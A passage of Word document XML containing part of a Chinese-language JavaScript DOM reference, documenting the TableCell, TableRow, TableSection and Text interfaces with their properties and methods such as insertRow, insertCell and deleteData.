        <w:t>移除当前表格的第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果存在这样的元素的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableRow insertRow([long index])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将它插入当前表格的指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处，并返回它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新的行将插入到索引为</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处的已有行前方相邻的位置，并与这个指定的行在同一个部分中。如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>等于当前表格的行数（或</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>），则新行将追加到当前表格的最后一个部分中。如果表格初始状态为空，则这个新行将先插入到一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞段落，然后随着这个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞一起插入到表格中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用方便的方法</w:t>
      </w:r>
      <w:r>
        <w:t>TableRow.insertCell()</w:t>
      </w:r>
      <w:r>
        <w:t>来添加内容到新创建的行中。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>insertRow()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="873" w:name="TableCell"/>
      <w:r>
        <w:t>TableCell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="873"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格中的单元格</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TableCell</w:t>
      </w:r>
      <w:r>
        <w:t>对象表现为＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long cellIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前单元格在它所属的行中的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long colSpan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML conspan</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，数字形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned long rowSpan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML rowspan</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，数字形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="874" w:name="TableRow"/>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="874"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格中的一行（一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素），它定义了若干操作这一行包含的</w:t>
      </w:r>
      <w:r>
        <w:t>Table</w:t>
      </w:r>
      <w:r>
        <w:t>Cell</w:t>
      </w:r>
      <w:r>
        <w:t>元素的属性及方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection cells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由代表当前行中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>TableCell</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long rowIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前行在表格中的索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long sectionRowIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前行在所属的部分中（例如，在包含它的＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞中）的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteCell(long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在当前行中删除指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处的单元格</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element insertCell([long index])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将它插入到当前行的指定位置，并返回这个元素。新的单元格将插入到当前位于</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>指定的位置的单元格的前方相邻位置。如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>省略、值为</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>或等于当前行中单元格的数目，则新的单元格将追加到当前行的最后。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这个方便的方法只插入＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞数据单元格。如果需要添加一个标题单元格到一行中，必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>方法及</w:t>
      </w:r>
      <w:r>
        <w:t>Node.insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>或相关的方法来创建及</w:t>
      </w:r>
      <w:r>
        <w:t>插入＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="875" w:name="TableSection"/>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="875"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表格的页眉、页脚或正文部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。表格的</w:t>
      </w:r>
      <w:r>
        <w:t>tHead</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>tFoot</w:t>
      </w:r>
      <w:r>
        <w:t>属性是</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
      <w:r>
        <w:t>tBodies</w:t>
      </w:r>
      <w:r>
        <w:t>属性是由</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>包含若干</w:t>
      </w:r>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:r>
        <w:t>对象，同时属于某个</w:t>
      </w:r>
      <w:r>
        <w:t>Table</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection rows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的类数组对象，代表当前表格中本部分的所有行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteRow(long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法删除当前部分中指定位置的行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableRow insertRow([long index])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将它插入到当前表格部分中的指定位置，并返回这个元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>或省略或者等于</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前部分中的行数，则新的行将追加到当前部分的结尾。否则，新的行将插入到当前由</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>指定位置处的行前方相邻的位置。注意，在这个方法中，</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>指定的是在</w:t>
      </w:r>
      <w:r>
        <w:t>一个单独的表格部分中的某一行的位置，而不是在整个表格中的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="876" w:name="Text"/>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="876"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档中的一串文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点表现为文档中的一串文本，通常在文档树中作为某个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的子节点出现。</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的内容可通过</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性或</w:t>
      </w:r>
      <w:r>
        <w:t>nodeValue</w:t>
      </w:r>
      <w:r>
        <w:t>以及继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问。可使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createTextNode()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点永远不会有子节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前节点包含的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly unsigned long </w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前节点对应文本的字符长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string wholeText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前节点以及与它前后相邻的文本节点的文本内容。如果在父节点上调用过</w:t>
      </w:r>
      <w:r>
        <w:t>normalize()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，则这个属性的值将与</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>的值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除非你在写一个基于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的文本编辑器应用，不然这些方法应该不会经常用到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void appendData(string text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法追加指定的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>到当前</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点结尾处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void deleteData(unsigned long offset,unsigned </w:t>
      </w:r>
      <w:r>
        <w:t>long count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法从当前</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点中删除从位置</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>的字符开始的</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>个字符。如果</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>加上</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>大于当前</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点中的字符数目，则当前字符串中从</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t>开始到结尾的字符都将删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void insertData(unsigned long offset,string text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
